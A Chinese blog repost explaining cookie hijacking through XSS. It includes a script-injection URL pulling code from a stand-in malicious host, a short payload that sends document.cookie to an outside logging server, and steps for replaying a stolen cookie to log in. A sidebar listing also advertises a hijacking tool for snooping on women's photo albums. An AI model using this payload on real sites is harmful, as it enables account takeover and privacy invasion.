说说劫持 Cookie 的原理

最新推荐文章于 2024-07-26 11:41:15 发布
最新推荐文章于 2024-07-26 11:41:15 发布
阅读量605 收藏 1
点赞数
文章标签: javascript 后端 ViewUI
原文链接:https://juejin.im/post/5ca85653e51d452eb272bc1f
版权

完成具体功能的恶意脚本(javaScript、Flash 等)称为 XSS Payload。黑客会通过这些脚本,来控制用户的浏览器。劫持 Cookie 就是一种 XSS Payload。

Cookie 中,一般加密存放着当前用户的登陆凭证。如果 Cookie 被劫持,那么黑客就可以不使用密码,直接登陆到用户的账号中。

1 窃取 Cookie

首先先在存在 XSS 漏洞的网站,加载一段远程脚本,形如:

http://www.xxx.com/xxx.html?param="><script src=http://www.malice.com/malice.js></script>
复制代码

XSS Payload 写在 malice.js 中,这样就可以避免直接在 URL 参数中写入大量的脚本代码。

malice.js 内容:

var img = document.createElement("img");
img.src = "http://xxx.com/log?" + escape(document.cookie);
document.body.appendChild(img);
复制代码

escape() 函数可对字符串进行编码,这样就可以在所有的计算机上读取该字符串。

在此,我们动态创建了一个图片标签,并把 cookie 参数作为对象,发送给后端服务器。

这样就完成了窃取 Cookie 的整个过程。

2 利用 Cookie 登陆账户

一个网站,如果还未登录,一般在右上角有个 “登录” 链接:

假设已经得到了某个账户的 Cookie 信息,那么就可以在 Fiddler 中,模拟 Get 请求:

然后就可以成功登陆网站咯:

转载于:https://juejin.im/post/5ca85653e51d452eb272bc1f

weixin_34329187
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
java写的cookie劫持工具
12-01
非常简单但功能强大的cookie劫持工具,局域网看妹子照片,进妹子相册必备。
3分钟了解vue数据劫持原理实现
10-17
主要介绍了3分钟了解vue数据劫持原理实现,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习吧
请解释一下Cookie劫持是什么,以及如何防止?
长风破浪会有时的博客
04-01 607
Cookie就像是我们放在网上的一个小标记,它可以帮助网站记住我们的一些信息,比如我们的用户名或者我们喜欢的东西。这样,当我们下次再去那个网站的时候,网站就可以通过这个小标记来认出我们,并为我们提供更好的服务。但是,有时候坏人会想办法偷走我们的这个小标记,也就是Cookie,然后利用它来假冒我们的身份去做一些不好的事情,比如进入我们的账户或者窃取我们的信息。:当我们在使用网络的时候,要尽量使用安全的网络连接,比如家里的WiFi或者学校的网络。:首先,我们要确保我们的电脑和手机是安全的,不被坏人控制。
劫持Cookie的理
rede
04-19 1081
劫持 Cookie原理 完成具体功能的恶意脚本(javaScript、Flash 等)称为 XSS Payload。黑客会通过这些脚本,来控制用户的浏览器。劫持 Cookie 就是一种 XSS Payload。 Cookie 中,一般加密存放着当前用户的登陆凭证。如果 Cookie劫持,那么黑客就可以不使用密码,直接登陆到用户的账号中。 1 窃取 Cookie 首先先在存在 XS...
Cookie的理
塞尔达的传说
04-19 143
劫持 Cookie原理 完成具体功能的恶意脚本(javaScript、Flash 等)称为 XSS Payload。黑客会通过这些脚本,来控制用户的浏览器。劫持 Cookie 就是一种 XSS Payload。 Cookie 中,一般加密存放着当前用户的登陆凭证。如果 Cookie劫持,那么黑客就可以不使用密码,直接登陆到用户的账号中。 1 窃取 Cookie 首先先在存在 XS...
劫持Coke理
绿杨
04-19 212
劫持 Cookie原理 完成具体功能的恶意脚本(javaScript、Flash 等)称为 XSS Payload。黑客会通过这些脚本,来控制用户的浏览器。劫持 Cookie 就是一种 XSS Payload。 Cookie 中,一般加密存放着当前用户的登陆凭证。如果 Cookie劫持,那么黑客就可以不使用密码,直接登陆到用户的账号中。 1 窃取 Cookie 首先先在存在 XS...
一文彻底弄懂cookie、session、token
开源世界
07-16 233
前言 作为一个JAVA开发,之前有好几次出去面试,面试官都问我,JAVAWeb掌握的怎么样,我当时就不知道怎么回答,Web,日常开发中用的是什么?今天我们来JAVAWeb最应该掌握的三个内容。 发展历程 1、很久很久以前,Web 基本上就是文档的浏览而已, 既然是浏览,作为服务器, 不需要记录谁在某一段时间里都浏览了什么文档,每次请求都是一个新的HTTP协议, 就是请求加响应, 尤其是我不用记住是谁刚刚发了HTTP请求, 每个请求对我来都是全新的。 2、但是随着交互式Web应用的兴起,像在线购物网站,
聊聊cookie的那些事
面向对象的夜猫子
10-10 215
前言 cookie在web开发中时常被用到,也是面试官喜欢问的一块技术,很多人或许和我以前一样,只知其一不知其二,谈起web存储,都会答localStorage、sessionStorage、还有就是cookie,然后一些区别啊什么的倒背如流,cookie的优缺点也了然于心,但是当你看完这块内容之后,你会对cookie有另外独到的见解,希望以后问到这块技术,或者项目中遇到这个你都会处理,我在实习
应对服务器端访问限制的一些办法(Cookie,Session,IP等)
lbjowen的博客
09-10 3537
关于IP欺骗的,实现的方式一个是修改HTTP头,一个是重复拨号的方式。在这方面,贫道有一点经验。不要鄙视贫道,大概5年前,还是大三大四的时候,帮朋友搞私服。在当时的一些论坛上宣传,做了自动发贴、跟帖的机器人。当时对TCP/IP理解还不深刻,在写自动注册模块的时候,用了代理服务器的方式防止网管发现注册帐号都是一个IP的。后来也写过一些自动投票之类的工具。 如果服务器对访问做限制,大致分为以下几种情...
cookie 和 session的应用场景
weixin_43209953的博客
02-02 2449
不管怎么样,还是要先扯一下,cookie为什么有这么个玩意儿。那就得下http协议,因为http协议是一个无状态的协议,什么是无状态,就是在客户端向服务器请求页面的时候,无论是静态还是动态,是首页,还是别的页面,就是不管什么页面;比如:我请求了一个链接:www.baidu.com,我在浏览器窗口输入这个地址之后,按回车,那么就是我客户端通过浏览器向服务器发送了一个请求,那么一般情况下,打个比...
深入浅出谈Cookie
weixin_34088583的博客
02-25 66
从经典的购物车起 发现很多地方在介绍cookie的作用时,都喜欢使用购物车的例子,那我们也不妨从这个例子开始起。 场景示例:有用户a和b,都登陆了某个购物网站,此时如果两个用户都点击了【查看购物车】按钮,那么此时服务器就同时收到了2个请求,请求的内容都是:“请告诉我我的购物车有什么商品”。现在问题来了——服务器怎么区分哪个请求对应哪个...
深入浅出 Vue 系列 -- 数据劫持实现原理
10-17
深入浅出 Vue 系列 -- 数据劫持实现原理 数据劫持是 Vue 框架核心功能之一,它使得开发者能够轻松地实现数据的双向绑定。在本篇文章中,我们将深入探讨 Vue 实现数据劫持原理,并对其实现细节进行剖析。 一、...
基于Cookie劫持的Deep-Web用户数据安全性分析
02-24
通过对主流社交网络和电子商务网站实施Cookie劫持攻击实验,发现虽然Deep-Web网站提供了诸如HTTPS协议等的安全保障措施,但大多数并不能抵御Cookie劫持攻击.攻击者可以仿冒合法用户行为,获取用户信息.最后,对实验结果...
session&cookie.zip
11-10
下面将详细讲解Session和Cookie的工作原理、应用场景以及两者之间的区别。 1. **Cookie** - **定义**:Cookie是由服务器发送到浏览器并存储在本地的一小段文本数据。当浏览器再次请求同一个服务器时,它会自动将...
【React 】开发环境搭建详细指南
lph159的博客
07-24 1165
无论你是刚刚开始学习 React,还是希望在现有项目中采用 React 技术,搭建一个高效的开发环境都是至关重要的。本文将详细介绍如何从零开始搭建 React 开发环境,涵盖所需的工具和最佳实践,帮助你快速启动并顺利进行开发。Visual Studio Code(VS Code)是目前最流行的代码编辑器之一,提供了丰富的扩展和强大的功能。如果你希望对项目的配置有更多的控制,可以选择手动配置 React 项目。下载并安装最新版本的 Node.js,安装 Node.js 后,npm 会自动安装。
在Vue程序中,如何检测用户的登录状态并跳转到对应页面
exlink2012的专栏
07-25 339
通过以上步骤,你可以在Vue应用程序中检测用户的登录状态,并在用户尝试访问受保护页面时跳转到登录页面。同时,在用户登录和登出后,你可以根据需要跳转到相应的页面。
已解决:vue-office/excel 多个sheet点击切换,滚动条高度不重置,表格视图位置不正确
weixin_42289080的博客
07-26 208
解决 @vue-office/excel 多个sheet切换,内容以及滚动条展示不正确的问题
vue el-select的下拉树形结构 带检索功能
最新发布
Jokerxiuka的博客
07-26 166
【代码】vue el-select的下拉树形结构。
vue双向绑定原理
06-07
Vue双向绑定的实现原理是通过数据劫持结合发布-订阅模式来实现的。当数据发生变化时,会触发setter函数,setter函数会通知订阅者进行更新操作,从而实现视图的更新。 在Vue中,每一个组件都有一个对应的Watcher实例...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值